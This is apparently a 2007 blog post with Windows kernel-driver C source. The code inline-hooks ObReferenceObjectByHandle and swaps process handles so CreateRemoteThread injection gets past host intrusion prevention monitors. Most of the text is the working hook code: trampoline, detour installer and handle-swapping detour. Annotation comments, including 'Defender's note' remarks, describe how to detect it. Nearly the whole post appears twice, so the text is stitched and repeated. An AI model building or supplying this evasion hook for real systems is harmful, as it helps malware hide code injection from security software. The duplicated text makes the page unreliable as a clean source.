bypass HIPS CreateRemoteThread Monitor
Author:kruglinski(kruglinski_at_sohu_dot_com)
site:http://hi.baidu.com/kruglinski
date:2007.10.21
CreateThread
+CreateRemoteThread
+NtCreateThread
+PspCreateThread
+ObReferenceObjectByHandle
Inline hook on ObReferenceObjectByHandle:
lkd> u nt!ObReferenceObjectByHandle
nt!ObReferenceObjectByHandle:
805bb050 8bff mov edi,edi
805bb052 55 push ebp
805bb053 8bec mov ebp,esp
805bb055 51 push ecx
805bb056 53 push ebx
805bb057 56 push esi
805bb058 57 push edi
805bb059 64a124010000 mov eax,dword ptr fs:[00000124h]
Source code:
/*
 * Trampoline: a 32-byte NOP-filled scratch function that EnableHook()
 * rewrites at run time.  __declspec(naked) suppresses the compiler's
 * prologue/epilogue, so the function body really is just the 32 NOP
 * bytes (0x90) below and nothing else.  EnableHook() copies the first
 * instructions of ObReferenceObjectByHandle over the start of this area,
 * appends a JMP back into the original function, and records the copied
 * length in the last four bytes; DisableHook() reads that length
 * (0x90909090, i.e. four untouched NOPs, means "never patched") to put
 * the original bytes back.
 *
 * The parameter list mirrors ObReferenceObjectByHandle only so that
 * MyObRefObjByHandle can forward its arguments with a plain call.
 *
 * There is no ret instruction here: if this is ever called before
 * EnableHook() has patched it, execution runs through the NOPs and into
 * whatever happens to follow in memory.
 *
 * Defender's note: an executable NOP area inside a driver image that is
 * rewritten after load is a self-modifying-code pattern; hashing the
 * loaded code section, or comparing it against the on-disk image, shows
 * the difference.
 */
NTSTATUS __declspec(naked) Trampoline(
HANDLE Handle,
ACCESS_MASK DesiredAccess,
POBJECT_TYPE ObjectType,
KPROCESSOR_MODE AccessMode,
PVOID *Object,
POBJECT_HANDLE_INFORMATION HandleInformation
)
{
/* 32 x 0x90: the whole body is patched by EnableHook() */
__asm
{
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
}
}
/*
 * EnableHook: installs an inline (detour) hook on nt!ObReferenceObjectByHandle.
 *
 * Steps:
 *   1. Disassemble forward from the function entry until at least 5 bytes
 *      of whole instructions have been covered (5 = size of a JMP rel32).
 *   2. Copy those bytes into Trampoline, follow them with a JMP to the
 *      first instruction that was not copied, and store the byte count at
 *      Trampoline offset 32 - sizeof(ULONG) for DisableHook().
 *   3. Overwrite the entry of ObReferenceObjectByHandle with a JMP to
 *      MyObRefObjByHandle.
 *
 * Returns TRUE on success; FALSE if a JMP (0xE9) is found while walking
 * the prologue or the prologue needs more than 32 bytes.
 *
 * Relies on Disasm() (defined elsewhere, not on this page) returning the
 * length in bytes of the instruction at the given address.  The two
 * RtlCopyMemory writes into live kernel code are plain memory copies; the
 * author's own comment below records the atomicity concern.
 *
 * Defender's note: the 0xE9 test inside the loop is the same test an
 * integrity checker applies -- a JMP as the first byte of a kernel export
 * whose on-disk prologue is "mov edi,edi / push ebp / mov ebp,esp" is the
 * visible signature of this kind of hook.
 */
BOOLEAN EnableHook(void)
{
PBYTE pfnObRefByHandle=(PBYTE)&ObReferenceObjectByHandle; // walks forward over the prologue
ULONG uTotals=0; // bytes covered so far
ULONG uSize=0; // length of the current instruction
KdBreakPoint(); // debug artifact: traps into an attached kernel debugger
while(uTotals<5)
{
// a JMP at the current position is treated as "already hooked": give up
if(*pfnObRefByHandle==0xe9)
return FALSE;
uSize=Disasm((PBYTE)pfnObRefByHandle,15);// uses a trimmed-down version of OllyDbg's disassembler engine
pfnObRefByHandle+=uSize;
uTotals+=uSize;
}
// Trampoline holds 32 bytes in total
if(uTotals>32)
return FALSE;
// I would have liked to copy with lock rep movsb, but I don't remember whether the lock and rep prefixes are valid together
RtlCopyMemory(&Trampoline,&ObReferenceObjectByHandle,uTotals);
{
PBYTE pTramp=(PBYTE)&Trampoline;
pTramp+=uTotals;
*pTramp=0xe9; // JMP rel32 ...
pTramp++;
// ... to the first original instruction that was not copied; rel32 is
// relative to the end of the 5-byte JMP (pTramp+4)
*(int*)pTramp=(int)pfnObRefByHandle-(int)(pTramp+4);
pTramp=(PBYTE)&Trampoline;
// stash the copied length in Trampoline's last four bytes for DisableHook()
*(ULONG*)&pTramp[32-sizeof(ULONG)]=uTotals;
}
{
BYTE Jump[5]={0};
Jump[0]=0xe9;
// rel32 from the end of the 5-byte JMP at the entry to MyObRefObjByHandle
*(int*)&Jump[1]=(int)&MyObRefObjByHandle-((int)&ObReferenceObjectByHandle+5);
RtlCopyMemory(&ObReferenceObjectByHandle,Jump,5);
}
return TRUE;
}
/*
 * DisableHook: writes the original entry bytes of ObReferenceObjectByHandle
 * back from the copy EnableHook() saved in Trampoline.
 *
 * The saved length lives in Trampoline's last four bytes.  0x90909090 is
 * four of the original NOPs, meaning EnableHook() never ran; in that case
 * nothing is written and FALSE is returned.  Otherwise the first uTotals
 * bytes of Trampoline (the saved prologue) are copied over the entry and
 * TRUE is returned.
 *
 * Only the entry bytes are restored; Trampoline itself stays patched.  The
 * code does not verify that the bytes at the entry are still this driver's
 * JMP before overwriting them, and nothing waits for callers that may be
 * executing inside Trampoline at that moment.
 */
BOOLEAN DisableHook(void)
{
PBYTE pTramp=(PBYTE)&Trampoline;
ULONG uTotals=*(ULONG*)&pTramp[32-sizeof(ULONG)]; // length stored by EnableHook()
KdBreakPoint(); // debug artifact: traps into an attached kernel debugger
if(uTotals!=0x90909090) // anything but the untouched NOPs means the hook was installed
{
RtlCopyMemory(&ObReferenceObjectByHandle,&Trampoline,uTotals);
return TRUE;
}
return FALSE;
}
/*
 * MyObRefObjByHandle: the detour target that runs in place of
 * ObReferenceObjectByHandle once EnableHook() has installed the JMP.
 *
 * When all of the following hold, the Handle argument is replaced by the
 * global hRemapHandle before the original code runs:
 *   - the caller is resolving a process object (ObjectType==PsProcessType),
 *   - with the current-process pseudo handle (NtCurrentProcess()),
 *   - for exactly PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION or
 *     PROCESS_VM_WRITE (compared with ==, so a combined mask such as
 *     PROCESS_CREATE_THREAD|PROCESS_VM_WRITE is not redirected),
 *   - the request came from user mode (AccessMode==UserMode), and
 *   - the calling process id equals the global RemapID.
 * Every other call passes through unchanged.  The original function body
 * is reached through Trampoline, which EnableHook() filled with the saved
 * prologue followed by a JMP into the rest of ObReferenceObjectByHandle.
 *
 * RemapID and hRemapHandle are defined elsewhere and not shown on this
 * page; presumably hRemapHandle must be a handle that is valid in the
 * context of the calling process, since it is looked up there -- confirm
 * against the code that sets them.
 *
 * Defender's note: the swap happens below the system-call boundary, so a
 * monitor that reasons about the handle value the caller presented sees a
 * self-targeted call, while *Object resolves to the process behind
 * hRemapHandle.  Detection that keys off the resolved object -- for
 * example the process reported to a PsSetCreateThreadNotifyRoutine
 * callback -- rather than the caller's handle value is not misled.
 */
NTSTATUS
MyObRefObjByHandle(
HANDLE Handle,
ACCESS_MASK DesiredAccess,
POBJECT_TYPE ObjectType,
KPROCESSOR_MODE AccessMode,
PVOID *Object,
POBJECT_HANDLE_INFORMATION HandleInformation
)
{
if(ObjectType==PsProcessType &&
Handle==NtCurrentProcess() &&
(
DesiredAccess==PROCESS_CREATE_THREAD ||
DesiredAccess==PROCESS_VM_OPERATION || // CreateRemoteThread cannot do without these operations
DesiredAccess==PROCESS_VM_WRITE
) &&
AccessMode==UserMode &&// avoid mistakenly redirecting operations that originate in the kernel
PsGetCurrentProcessId()==RemapID)// only for the process whose id matches the remap target
{
// swap the handle
Handle=hRemapHandle;
}
// Trampoline runs the saved prologue and jumps into the original function
return Trampoline(Handle,DesiredAccess,ObjectType,AccessMode,Object,HandleInformation);
}
site:http://hi.baidu.com/kruglinski
date:2007.10.21
CreateThread
+CreateRemoteThread
+NtCreateThread
+PspCreateThread
+ObReferenceObjectByHandle
Inline hook on ObReferenceObjectByHandle:
lkd> u nt!ObReferenceObjectByHandle
nt!ObReferenceObjectByHandle:
805bb050 8bff mov edi,edi
805bb052 55 push ebp
805bb053 8bec mov ebp,esp
805bb055 51 push ecx
805bb056 53 push ebx
805bb057 56 push esi
805bb058 57 push edi
805bb059 64a124010000 mov eax,dword ptr fs:[00000124h]
Source code:
/*
 * Trampoline: a 32-byte NOP-filled scratch function that EnableHook()
 * rewrites at run time.  __declspec(naked) suppresses the compiler's
 * prologue/epilogue, so the function body really is just the 32 NOP
 * bytes (0x90) below and nothing else.  EnableHook() copies the first
 * instructions of ObReferenceObjectByHandle over the start of this area,
 * appends a JMP back into the original function, and records the copied
 * length in the last four bytes; DisableHook() reads that length
 * (0x90909090, i.e. four untouched NOPs, means "never patched") to put
 * the original bytes back.
 *
 * The parameter list mirrors ObReferenceObjectByHandle only so that
 * MyObRefObjByHandle can forward its arguments with a plain call.
 *
 * There is no ret instruction here: if this is ever called before
 * EnableHook() has patched it, execution runs through the NOPs and into
 * whatever happens to follow in memory.
 *
 * Defender's note: an executable NOP area inside a driver image that is
 * rewritten after load is a self-modifying-code pattern; hashing the
 * loaded code section, or comparing it against the on-disk image, shows
 * the difference.
 */
NTSTATUS __declspec(naked) Trampoline(
HANDLE Handle,
ACCESS_MASK DesiredAccess,
POBJECT_TYPE ObjectType,
KPROCESSOR_MODE AccessMode,
PVOID *Object,
POBJECT_HANDLE_INFORMATION HandleInformation
)
{
/* 32 x 0x90: the whole body is patched by EnableHook() */
__asm
{
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
}
}
/*
 * EnableHook: installs an inline (detour) hook on nt!ObReferenceObjectByHandle.
 *
 * Steps:
 *   1. Disassemble forward from the function entry until at least 5 bytes
 *      of whole instructions have been covered (5 = size of a JMP rel32).
 *   2. Copy those bytes into Trampoline, follow them with a JMP to the
 *      first instruction that was not copied, and store the byte count at
 *      Trampoline offset 32 - sizeof(ULONG) for DisableHook().
 *   3. Overwrite the entry of ObReferenceObjectByHandle with a JMP to
 *      MyObRefObjByHandle.
 *
 * Returns TRUE on success; FALSE if a JMP (0xE9) is found while walking
 * the prologue or the prologue needs more than 32 bytes.
 *
 * Relies on Disasm() (defined elsewhere, not on this page) returning the
 * length in bytes of the instruction at the given address.  The two
 * RtlCopyMemory writes into live kernel code are plain memory copies; the
 * author's own comment below records the atomicity concern.
 *
 * Defender's note: the 0xE9 test inside the loop is the same test an
 * integrity checker applies -- a JMP as the first byte of a kernel export
 * whose on-disk prologue is "mov edi,edi / push ebp / mov ebp,esp" is the
 * visible signature of this kind of hook.
 */
BOOLEAN EnableHook(void)
{
PBYTE pfnObRefByHandle=(PBYTE)&ObReferenceObjectByHandle; // walks forward over the prologue
ULONG uTotals=0; // bytes covered so far
ULONG uSize=0; // length of the current instruction
KdBreakPoint(); // debug artifact: traps into an attached kernel debugger
while(uTotals<5)
{
// a JMP at the current position is treated as "already hooked": give up
if(*pfnObRefByHandle==0xe9)
return FALSE;
uSize=Disasm((PBYTE)pfnObRefByHandle,15);// uses a trimmed-down version of OllyDbg's disassembler engine
pfnObRefByHandle+=uSize;
uTotals+=uSize;
}
// Trampoline holds 32 bytes in total
if(uTotals>32)
return FALSE;
// I would have liked to copy with lock rep movsb, but I don't remember whether the lock and rep prefixes are valid together
RtlCopyMemory(&Trampoline,&ObReferenceObjectByHandle,uTotals);
{
PBYTE pTramp=(PBYTE)&Trampoline;
pTramp+=uTotals;
*pTramp=0xe9; // JMP rel32 ...
pTramp++;
// ... to the first original instruction that was not copied; rel32 is
// relative to the end of the 5-byte JMP (pTramp+4)
*(int*)pTramp=(int)pfnObRefByHandle-(int)(pTramp+4);
pTramp=(PBYTE)&Trampoline;
// stash the copied length in Trampoline's last four bytes for DisableHook()
*(ULONG*)&pTramp[32-sizeof(ULONG)]=uTotals;
}
{
BYTE Jump[5]={0};
Jump[0]=0xe9;
// rel32 from the end of the 5-byte JMP at the entry to MyObRefObjByHandle
*(int*)&Jump[1]=(int)&MyObRefObjByHandle-((int)&ObReferenceObjectByHandle+5);
RtlCopyMemory(&ObReferenceObjectByHandle,Jump,5);
}
return TRUE;
}
/*
 * DisableHook: writes the original entry bytes of ObReferenceObjectByHandle
 * back from the copy EnableHook() saved in Trampoline.
 *
 * The saved length lives in Trampoline's last four bytes.  0x90909090 is
 * four of the original NOPs, meaning EnableHook() never ran; in that case
 * nothing is written and FALSE is returned.  Otherwise the first uTotals
 * bytes of Trampoline (the saved prologue) are copied over the entry and
 * TRUE is returned.
 *
 * Only the entry bytes are restored; Trampoline itself stays patched.  The
 * code does not verify that the bytes at the entry are still this driver's
 * JMP before overwriting them, and nothing waits for callers that may be
 * executing inside Trampoline at that moment.
 */
BOOLEAN DisableHook(void)
{
PBYTE pTramp=(PBYTE)&Trampoline;
ULONG uTotals=*(ULONG*)&pTramp[32-sizeof(ULONG)]; // length stored by EnableHook()
KdBreakPoint(); // debug artifact: traps into an attached kernel debugger
if(uTotals!=0x90909090) // anything but the untouched NOPs means the hook was installed
{
RtlCopyMemory(&ObReferenceObjectByHandle,&Trampoline,uTotals);
return TRUE;
}
return FALSE;
}
/*
 * MyObRefObjByHandle: the detour target that runs in place of
 * ObReferenceObjectByHandle once EnableHook() has installed the JMP.
 *
 * When all of the following hold, the Handle argument is replaced by the
 * global hRemapHandle before the original code runs:
 *   - the caller is resolving a process object (ObjectType==PsProcessType),
 *   - with the current-process pseudo handle (NtCurrentProcess()),
 *   - for exactly PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION or
 *     PROCESS_VM_WRITE (compared with ==, so a combined mask such as
 *     PROCESS_CREATE_THREAD|PROCESS_VM_WRITE is not redirected),
 *   - the request came from user mode (AccessMode==UserMode), and
 *   - the calling process id equals the global RemapID.
 * Every other call passes through unchanged.  The original function body
 * is reached through Trampoline, which EnableHook() filled with the saved
 * prologue followed by a JMP into the rest of ObReferenceObjectByHandle.
 *
 * RemapID and hRemapHandle are defined elsewhere and not shown on this
 * page; presumably hRemapHandle must be a handle that is valid in the
 * context of the calling process, since it is looked up there -- confirm
 * against the code that sets them.
 *
 * Defender's note: the swap happens below the system-call boundary, so a
 * monitor that reasons about the handle value the caller presented sees a
 * self-targeted call, while *Object resolves to the process behind
 * hRemapHandle.  Detection that keys off the resolved object -- for
 * example the process reported to a PsSetCreateThreadNotifyRoutine
 * callback -- rather than the caller's handle value is not misled.
 */
NTSTATUS
MyObRefObjByHandle(
HANDLE Handle,
ACCESS_MASK DesiredAccess,
POBJECT_TYPE ObjectType,
KPROCESSOR_MODE AccessMode,
PVOID *Object,
POBJECT_HANDLE_INFORMATION HandleInformation
)
{
if(ObjectType==PsProcessType &&
Handle==NtCurrentProcess() &&
(
DesiredAccess==PROCESS_CREATE_THREAD ||
DesiredAccess==PROCESS_VM_OPERATION || // CreateRemoteThread cannot do without these operations
DesiredAccess==PROCESS_VM_WRITE
) &&
AccessMode==UserMode &&// avoid mistakenly redirecting operations that originate in the kernel
PsGetCurrentProcessId()==RemapID)// only for the process whose id matches the remap target
{
// swap the handle
Handle=hRemapHandle;
}
// Trampoline runs the saved prologue and jumps into the original function
return Trampoline(Handle,DesiredAccess,ObjectType,AccessMode,Object,HandleInformation);
}